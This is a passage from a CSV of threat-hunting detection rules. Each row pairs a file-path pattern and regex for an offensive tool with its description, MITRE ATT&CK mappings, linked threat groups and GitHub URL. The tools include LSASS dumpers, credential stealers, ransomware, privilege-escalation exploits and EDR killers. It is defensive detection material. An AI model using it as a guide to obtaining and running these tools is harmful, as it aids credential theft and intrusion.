RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","17410" "*\PowerView.ps1*",".{0,1000}\\PowerView\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - 
T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","17411" "*\powerview.py*",".{0,1000}\\powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","17412" "*\PowerView3.*",".{0,1000}\\PowerView3\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal 
- Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","0","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","17413" "*\ppid_spoofing.exe*",".{0,1000}\\ppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17414" "*\ppl_dump.*",".{0,1000}\\ppl_dump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","17415" "*\PPLBlade-main*",".{0,1000}\\PPLBlade\-main.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","17416" "*\PPLFault*",".{0,1000}\\PPLFault.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - 
TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","17417" "*\PPLKiller*",".{0,1000}\\PPLKiller.{0,1000}","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","N/A","10","10","933","139","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z","17418" "*\PPLmedic.cpp*",".{0,1000}\\PPLmedic\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17419" "*\PPLmedic.exe*",".{0,1000}\\PPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17420" "*\PPLmedic\PPLmedic*",".{0,1000}\\PPLmedic\\PPLmedic.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","17421" "*\pplsystem.exe*",".{0,1000}\\pplsystem\.exe.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","17422" "*\PPLSystem-main*",".{0,1000}\\PPLSystem\-main.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","17423" "*\Prasadhak.ps1*",".{0,1000}\\Prasadhak\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","17424" "*\Pre2kSpray.ps1*",".{0,1000}\\Pre2kSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Pre2kSpray","Enumerate domain machine accounts and perform pre2k password spraying.","T1087.002 - T1110.003","TA0007 - TA0006","N/A","N/A","Credential Access","https://github.com/eversinc33/Invoke-Pre2kSpray","1","0","N/A","N/A","8","1","69","11","2023-07-14T06:50:22Z","2023-07-05T10:07:38Z","17425" "*\PredatorTheStealer Dll.*",".{0,1000}\\PredatorTheStealer\sDll\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","17426" "*\PredatorTheStealer.*",".{0,1000}\\PredatorTheStealer\..{0,1000}","offensive_tool_keyword","PredatorTheStealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - 
TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/PredatorTheStealer","1","0","N/A","N/A","8","1","11","2","2022-12-06T16:46:33Z","2022-12-06T16:34:43Z","17427" "*\prefetch_leak.h*",".{0,1000}\\prefetch_leak\.h.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17444" "*\prefetch_tool.sln*",".{0,1000}\\prefetch_tool\.sln.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17445" "*\prefetch_tool.vcxproj*",".{0,1000}\\prefetch_tool\.vcxproj.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","17446" "*\pretender.exe*",".{0,1000}\\pretender\.exe.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","17447" "*\pretender_Windows_x86_64.zip*",".{0,1000}\\pretender_Windows_x86_64\.zip.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS 
- LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","17448" "*\Prince.v1.0.0.zip*",".{0,1000}\\Prince\.v1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","N/A","N/A","10","","N/A","","","","17449" "*\Prince-Built.exe*",".{0,1000}\\Prince\-Built\.exe.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","N/A","N/A","10","","N/A","","","","17450" "*\PrintCreds.py*",".{0,1000}\\PrintCreds\.py.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","17452" "*\printerbug.py*",".{0,1000}\\printerbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17453" "*\printernightmare.ps1*",".{0,1000}\\printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful 
PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","17454" "*\PrintNightmare.*",".{0,1000}\\PrintNightmare\..{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","N/A","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","17456" "*\printnightmare.py*",".{0,1000}\\printnightmare\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17457" "*\PrintSpoofer.cs*",".{0,1000}\\PrintSpoofer\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17458" "*\PrintSpoofer.csproj*",".{0,1000}\\PrintSpoofer\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17459" "*\PrintSpoofer.dll*",".{0,1000}\\PrintSpoofer\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17460" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17461" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - 
TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","17462" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17463" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrintSpoofer","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PrintSpoofer","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","17464" "*\PrintSpoofer.exe*",".{0,1000}\\PrintSpoofer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17465" "*\PrintSpoofer-1.0.zip*",".{0,1000}\\PrintSpoofer\-1\.0\.zip.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - 
T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","17466" "*\PrivEditor.dll*",".{0,1000}\\PrivEditor\.dll.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17467" "*\PrivEditor\*",".{0,1000}\\PrivEditor\\.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17468" "*\privesc.ps1*",".{0,1000}\\privesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","17469" "*\PrivEsc.txt*",".{0,1000}\\PrivEsc\.txt.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","17470" "*\PrivescCheck*",".{0,1000}\\PrivescCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17471" "*\PrivescCheck.ps1*",".{0,1000}\\PrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17472" "*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17473" "*\PrivescCheck_*",".{0,1000}\\PrivescCheck_.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","17474" "*\Privesc-master*",".{0,1000}\\Privesc\-master.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","N/A","10","6","595","97","2024-12-01T15:24:41Z","2015-11-19T13:22:01Z","17475" "*\privexchange.py*",".{0,1000}\\privexchange\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat 
sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","17476" "*\PrivFu.txt*",".{0,1000}\\PrivFu\.txt.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","17477" "*\privilege escalation.cna*",".{0,1000}\\privilege\sescalation\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","17478" "*\PrivKit\*",".{0,1000}\\PrivKit\\.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","17479" "*\procdump.py*",".{0,1000}\\procdump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","17481" "*\process_killer.cpp*",".{0,1000}\\process_killer\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","17484" "*\ProcessDLLHijack.cs*",".{0,1000}\\ProcessDLLHijack\.cs.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","17485" "*\processinjection.exe*",".{0,1000}\\processinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","17486" "*\ProcessSpoofing.h*",".{0,1000}\\ProcessSpoofing\.h.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","17487" 
"*\ProcProtectClient.exe*",".{0,1000}\\ProcProtectClient\.exe.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","17488" "*\Program Files (x86)\KidLogger*",".{0,1000}\\Program\sFiles\s\(x86\)\\KidLogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","17501" "*\Program Files\Bad Windows Service*",".{0,1000}\\Program\sFiles\\Bad\sWindows\sService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","N/A","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","17514" "*\Program Files\nps\*",".{0,1000}\\Program\sFiles\\nps\\.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","N/A","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","17529" "*\Program Rat V1.0 By Black 